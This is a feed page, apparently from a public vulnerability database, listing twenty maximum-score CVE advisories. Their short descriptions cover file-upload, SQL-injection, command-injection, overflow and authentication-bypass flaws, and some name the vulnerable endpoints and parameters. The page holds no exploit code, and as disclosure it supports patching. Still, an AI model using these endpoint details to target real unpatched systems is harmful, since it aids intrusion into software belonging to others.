Latest CVE Feed

  1. Home
  2. Vulnerabilities
  3. Latest
Following is the list of latest published vulnerabilities. You can filter the list based on the severity of the vulnerability, whether it is actively exploited (also known as CISA KEV List) or remotely exploitable. You can also sort the list based on the published date, last updated date, or CVSS score.
Latest Critical Actively Exploited Remotely Exploitable
Published Last Updated CVSS Score

  • 10.0

    CRITICAL
    CVE-2024-8940

    Vulnerability in the Scriptcase application version 9.4.019, which involves the arbitrary upload of a file via /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ via a POST request. An attacker could upload malicious files to the ser... Read more

    Affected Products : scriptcase
    • Published: Sep. 25, 2024
    • Modified: Oct. 01, 2024

  • 10.0

    CRITICAL
    CVE-2023-6018

    An attacker can overwrite any file on the server hosting MLflow without any authentication.... Read more

    Affected Products : mlflow
    • EPSS Score: %88.39
    • Published: Nov. 16, 2023
    • Modified: Nov. 21, 2024

  • 10.0

    HIGH
    CVE-2017-9479

    The Comcast firmware on Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST) devices allows remote attackers to execute arbitrary commands as root by leveraging local network access and connecting to the syseventd server, as demonst... Read more

    • EPSS Score: %2.34
    • Published: Jul. 31, 2017
    • Modified: Apr. 20, 2025

  • 10.0

    HIGH
    CVE-2024-7332

    A vulnerability was found in TOTOLINK CP450 4.1.0cu.747_B20191224. It has been classified as critical. This affects an unknown part of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded pass... Read more

    Affected Products : cp450_firmware cp450
    • Published: Aug. 01, 2024
    • Modified: Aug. 09, 2024

  • 10.0

    HIGH
    CVE-2011-2961

    Heap-based buffer overflow in AngelServer.exe 6.0.11.3 in Sunway pNetPower allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDP packet.... Read more

    Affected Products : pnetpower
    • EPSS Score: %11.19
    • Published: Jul. 29, 2011
    • Modified: Apr. 11, 2025

  • 10.0

    CRITICAL
    CVE-2024-32809

    Unrestricted Upload of File with Dangerous Type vulnerability in JumpDEMAND Inc. ActiveDEMAND allows Using Malicious Files.This issue affects ActiveDEMAND: from n/a through 0.2.41.... Read more

    Affected Products : activedemand
    • Published: May. 17, 2024
    • Modified: Nov. 21, 2024

  • 10.0

    HIGH
    CVE-2021-25437

    Improper access control vulnerability in Tizen FOTA service prior to Firmware update JUL-2021 Release allows attackers to arbitrary code execution by replacing FOTA update file.... Read more

    Affected Products : tizen
    • EPSS Score: %1.14
    • Published: Jul. 08, 2021
    • Modified: Nov. 21, 2024

  • 10.0

    CRITICAL
    CVE-2024-8529

    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping ... Read more

    Affected Products : learnpress
    • Published: Sep. 12, 2024
    • Modified: Sep. 13, 2024

  • 10.0

    HIGH
    CVE-2008-0529

    Buffer overflow in the telnet server in Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G, and 7971G running SCCP firmware might allow remote authenticated users to execute arbitrary code via a crafted command.... Read more

    • EPSS Score: %7.10
    • Published: Feb. 15, 2008
    • Modified: Apr. 09, 2025

  • 10.0

    HIGH
    CVE-2021-27944

    Several high privileged APIs on the Vizio P65-F1 6.0.31.4-2 and E50x-E1 10.0.31.4-2 Smart TVs do not enforce access controls, allowing an unauthenticated threat actor to access privileged functionality, leading to OS command execution. The specific attack... Read more

    • EPSS Score: %1.07
    • Published: Aug. 26, 2021
    • Modified: Nov. 21, 2024

  • 10.0

    HIGH
    CVE-2022-24552

    A flaw was found in the REST API in StarWind Stack. REST command, which manipulates a virtual disk, doesn’t check input parameters. Some of them go directly to bash as part of a script. An attacker with non-root user access can inject arbitrary data into ... Read more

    Affected Products : nas san
    • EPSS Score: %0.83
    • Published: Feb. 06, 2022
    • Modified: Nov. 21, 2024

  • 10.0

    CRITICAL
    CVE-2025-22612

    Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.374, the missing authorization allows an authenticated user to retrieve any existing private keys on a coolify instance in plai... Read more

    Affected Products :
    • Published: Jan. 24, 2025
    • Modified: Jan. 24, 2025
    • Vuln Type: Authorization

  • 10.0

    CRITICAL
    CVE-2024-10081

    CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Authentication bypass occurs when the API URL ends with Authentication. This bypass allows superuser access to all API endpoints other ... Read more

    Affected Products :
    • Published: Nov. 06, 2024
    • Modified: Nov. 06, 2024

  • 10.0

    CRITICAL
    CVE-2025-26936

    Improper Control of Generation of Code ('Code Injection') vulnerability in NotFound Fresh Framework allows Code Injection. This issue affects Fresh Framework: from n/a through 1.70.0.... Read more

    Affected Products :
    • Published: Mar. 10, 2025
    • Modified: Mar. 10, 2025
    • Vuln Type: Injection

  • 10.0

    CRITICAL
    CVE-2025-30367

    WeGIA is a Web manager for charitable institutions. A SQL Injection vulnerability was identified in versions prior to 3.2.6 in the nextPage parameter of the /WeGIA/controle/control.php endpoint. This vulnerability allows attacker to manipulate SQL queries... Read more

    Affected Products : wegia
    • Published: Mar. 27, 2025
    • Modified: Apr. 10, 2025
    • Vuln Type: Injection

  • 10.0

    CRITICAL
    CVE-2024-37902

    DeepJavaLibrary(DJL) is an Engine-Agnostic Deep Learning Framework in Java. DJL versions 0.1.0 through 0.27.0 do not prevent absolute path archived artifacts from inserting archived files directly into the system, overwriting system files. This is fixed i... Read more

    Affected Products :
    • Published: Jun. 17, 2024
    • Modified: Nov. 21, 2024

  • 10.0

    HIGH
    CVE-2007-0496

    PHP remote file inclusion vulnerability in lib/nl/nl.php in Neon Labs Website (nlws) 3.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the g_strRootDir parameter.... Read more

    Affected Products : neon_labs_website
    • EPSS Score: %1.45
    • Published: Jan. 25, 2007
    • Modified: Apr. 09, 2025

  • 10.0

    CRITICAL
    CVE-2024-4196

    An improper input validation vulnerability was discovered in Avaya IP Office that could allow remote command or code execution via a specially crafted web request to the Web Control component. Affected versions include all versions prior to 11.1.3.1.... Read more

    Affected Products : ip_office
    • Published: Jun. 25, 2024
    • Modified: Jan. 21, 2025

  • 10.0

    HIGH
    CVE-2025-5600

    A vulnerability, which was classified as critical, has been found in TOTOLINK EX1200T 4.1.2cu.5232_B20210713. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument LangType leads to stack-based b... Read more

    Affected Products : ex1200t_firmware ex1200t
    • Published: Jun. 04, 2025
    • Modified: Jun. 10, 2025
    • Vuln Type: Memory Corruption

  • 10.0

    CRITICAL
    CVE-2024-39911

    1Panel is a web-based linux server management control panel. 1Panel contains an unspecified sql injection via User-Agent handling. This issue has been addressed in version 1.10.12-lts. Users are advised to upgrade. There are no known workarounds for this ... Read more

    Affected Products : 1panel
    • Published: Jul. 18, 2024
    • Modified: Nov. 21, 2024
Showing 20 of 291316 Results